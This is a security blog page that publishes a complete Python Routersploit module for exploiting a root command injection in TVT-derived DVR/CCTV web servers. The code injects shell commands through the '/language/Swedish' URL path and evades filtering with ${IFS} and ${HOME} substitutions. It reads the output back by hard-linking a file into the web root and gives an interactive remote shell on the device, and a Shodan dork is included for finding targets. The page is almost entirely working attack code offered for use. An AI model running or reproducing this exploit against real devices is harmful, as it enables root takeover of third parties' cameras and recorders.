You are here : Home » Exploits » TVT DVR/CCTV webshell exploit

TVT DVR/CCTV webshell exploit

Routersploit version with exploitability check and webshell

D 15 December 2016     H 20:48     A Emeric Nasi     C 0 messages


agrandir
  1. """
  2. Hi,
  3. This is another exploit implementation for TVT derived DVR/CCTV devices which have a root cmd injection vulnerability
  4. This exploit is based on great work by Exodus ad kerneronsec
  5. (see http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html)
  6.  
  7. In the original exploit, the goal of the exploit is to play reverse nc. Here the exploit consist into running a webshell.
  8. NOTE: This version of exploit does not implement reverse nc, it would be however easy to add.
  9.  
  10. The other difference with first exploit is here we do not rely on older vuln to check if target is exploitable.
  11. In the first version the exploitability check relies on an older vulnerability to retrieve a file created by the exploit.
  12. It is a path traversal vulnerabilities (CVE-2013-6023)
  13.  
  14. In this version we avoid to rely on older vuln, instead we create a symlink to website path using exploit so that we can share file content.
  15.  
  16. If the target is vulnerable, command loop is invoked that allows executing commands on the device.
  17.  
  18.  
  19. WARNING: Be careful run short and sychronous cmd with webshell or you may need to reboot your device!
  20.  
  21.  
  22. NOTE: This version is a code I use on my Routersploit fork, it would be however easy to port in single autonomous python script.
  23.  
  24. Author:
  25. emeric.nasi@sevagas.com
  26. http://blog.sevagas.com
  27. https://www.sevagas.com
  28.  
  29. """
  30.  
  31.  
  32. import requests
  33. from requests.exceptions import ConnectionError, Timeout
  34. from socket import timeout
  35.  
  36. from routersploit import (
  37. exploits,
  38. print_success,
  39. print_status,
  40. print_error,
  41. mute,
  42. shell,
  43. )
  44.  
  45.  
  46. class Exploit(exploits.Exploit):
  47. """
  48. Exploit implementation for TVT derived devices which have a root cmd injection backdoor
  49. If the target is vulnerable, command loop is invoked that allows executing commands on the device.
  50. """
  51. __info__ = {
  52. 'name': 'TVT Cross Web Server HTTP Backdoor',
  53. 'description': 'Exploit implementation for TVT derived devices which have a root cmd injection backdoor.'
  54. 'If the target is vulnerable, http command loop is invoked that allows executing commands on the device.',
  55. 'authors': [
  56. 'Exodus at www.kerneronsec.com', # vulnerability discovery and first exploit (with reverse nc)
  57. 'Emeric Nasi', # Routersploit module
  58. ],
  59. 'references': [
  60. 'http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html',
  61. ],
  62. 'devices': [
  63. 'Lots of TVT derived devices (see original exploit)',
  64. 'Shodan dork: "Cross Web Server"',
  65. ]
  66. }
  67.  
  68. target = exploits.Option('', 'Target base address e.g. 192.168.1.1')
  69. port = exploits.Option(81, 'Target Cross Web Server http server port') # default port
  70. protocol = exploits.Option("http", 'http/https') # default protocol
  71.  
  72. # Disabling URL encode hack
  73. def raw_url_request(self, url):
  74. r = requests.Request('GET')
  75. r.url = url
  76. r = r.prepare()
  77. # set url without encoding
  78. r.url = url
  79. s = requests.Session()
  80. return s.send(r)
  81.  
  82.  
  83. def run(self):
  84. if self.check():
  85. print_success("Target is vulnerable ")
  86. print_status("Invoking command loop")
  87. shell(self)
  88. self.clean()
  89. else:
  90. print_error("Exploit failed - target seems to be not vulnerable")
  91.  
  92.  
  93. def execute(self, cmd):
  94. """ Inject a command on remote device """
  95. # Remove white space and slashed
  96. try:
  97. cmd = cmd.replace(" ", "${IFS}") # Trick to use whitespaces
  98. cmd = cmd.replace("/", "${HOME}") # Trick to use slash
  99.  
  100. request = "%s://%s:%s/language/Swedish${IFS}&&" % (self.protocol, self.target, str(self.port))
  101. request += cmd
  102. request += "&>o&&tar${IFS}/string.js"
  103. # Send cmd to server
  104. self.raw_url_request(request)
  105. response = self.raw_url_request("%s://%s:%s/o" % (self.protocol, self.target, str(self.port)))
  106. if response is None:
  107. return ""
  108. return response.text
  109. except (ConnectionError, Timeout, timeout) as e:
  110. print_error("Unable to connect reason: %s. exiting..." % e.message)
  111. return ""
  112.  
  113.  
  114. def clean(self):
  115. """ Remove created files """
  116. self.execute("rm WebSites/o")
  117. self.execute("rm o")
  118.  
  119.  
  120. @mute
  121. def check(self):
  122.  
  123. """
  124. Test if site is exploitable
  125. Create a file /mnt/mtd/o and put value '1' inside
  126. Then create a link from /mnt/mtd/WebSites/o to /mnt/mtd/o and check with http://<ip>:<port>/o contains 1
  127. Return true in case of success, or else false
  128. This way we avoid to rely on TVT path traversal vuln which is much older (CVE-2013-6023)
  129. """
  130. exploitable = True
  131. try:
  132. # Create file o
  133. cmd = "echo 1>o"
  134. cmd = cmd.replace(" ", "${IFS}")
  135. request = "%s://%s:%s/language/Swedish${IFS}&&" % (self.protocol, self.target, str(self.port))
  136. request += cmd + "&&tar${IFS}/string.js"
  137. # Send cmd to server
  138. self.raw_url_request(request)
  139. # Next create symlink to WebSites dir
  140. cmd = "ln o WebSites/o"
  141. cmd = cmd.replace(" ", "${IFS}") # Trick to use whitespaces
  142. cmd = cmd.replace("/", "${HOME}") # Trick to use slash
  143. request = "%s://%s:%s/language/Swedish${IFS}&&" % (self.protocol, self.target, str(self.port))
  144. request += cmd + "&&tar${IFS}/string.js"
  145. self.raw_url_request(request)
  146. # Check if file was correctly created
  147. response = self.raw_url_request("%s://%s:%s/o" % (self.protocol, self.target, str(self.port)))
  148. if response is None:
  149. exploitable = False
  150. elif response.text == "" or (response.text)[0] != '1':
  151. print_error("Expected response content first char to be '1' got %s. " % response.text)
  152. exploitable = False
  153.  
  154. except (ConnectionError, Timeout, timeout) as e:
  155. print_error("Unable to connect. reason: %s." % e.message)
  156. exploitable = False
  157.  
  158. if exploitable:
  159. print_success("Exploitable!")
  160. else:
  161. print_error("Not Exploitable.")
  162. return(exploitable)

Download

Also in this section

11 April 2015 – cve-2014-7822 Linux Kernel D.O.S POC

24 February 2015 – cve-2014-4943 Linux Kernel D.O.S POC

23 February 2015 – cve-2014-9322 Linux Kernel D.O.S POC

23 February 2015 – cve-2014-3631 Linux Kernel D.O.S POC

Any message or comments?
pre-moderation

This forum is moderated before publication: your contribution will only appear after being validated by an administrator.

Who are you?
Your post